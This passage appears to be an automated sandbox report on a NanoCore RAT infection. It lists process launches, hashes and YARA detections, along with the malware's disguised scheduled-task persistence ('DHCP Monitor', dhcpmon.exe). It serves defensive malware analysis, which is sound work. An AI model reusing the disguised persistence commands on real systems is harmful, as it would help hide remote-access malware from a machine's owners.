          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 46%, ReversingLabs
          Reputation:low

          Target ID:3
          Start time:08:10:05
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0xe80000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
          Antivirus matches:
          • Detection: 0%, ReversingLabs
          Reputation:high

          Target ID:4
          Start time:08:10:12
          Start date:02/02/2023
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
          Imagebase:0x2c0000
          File size:185856 bytes
          MD5 hash:15FF7D8324231381BAD48A052F85DF04
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:5
          Start time:08:10:12
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:low

          Target ID:6
          Start time:08:10:13
          Start date:02/02/2023
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7fcd70000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:7
          Start time:08:10:13
          Start date:02/02/2023
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
          Imagebase:0x2c0000
          File size:185856 bytes
          MD5 hash:15FF7D8324231381BAD48A052F85DF04
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:8
          Start time:08:10:13
          Start date:02/02/2023
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7fcd70000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:9
          Start time:08:10:14
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
          Imagebase:0xc60000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET

          Target ID:10
          Start time:08:10:15
          Start date:02/02/2023
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7fcd70000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:11
          Start time:08:10:15
          Start date:02/02/2023
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
          Imagebase:0x400000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Antivirus matches:
          • Detection: 0%, ReversingLabs

          Target ID:12
          Start time:08:10:15
          Start date:02/02/2023
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7fcd70000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:13
          Start time:08:10:21
          Start date:02/02/2023
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
          Imagebase:0x7ff60c2e0000
          File size:163840 bytes
          MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language

          Target ID:16
          Start time:08:10:24
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

          Target ID:17
          Start time:08:10:33
          Start date:02/02/2023
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
          Imagebase:0x840000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET

          Target ID:18
          Start time:08:10:33
          Start date:02/02/2023
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7fcd70000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language

          Target ID:19
          Start time:08:10:34
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0x910000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: unknown

          Target ID:20
          Start time:08:10:40
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0x9c0000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET

          Target ID:21
          Start time:08:10:41
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
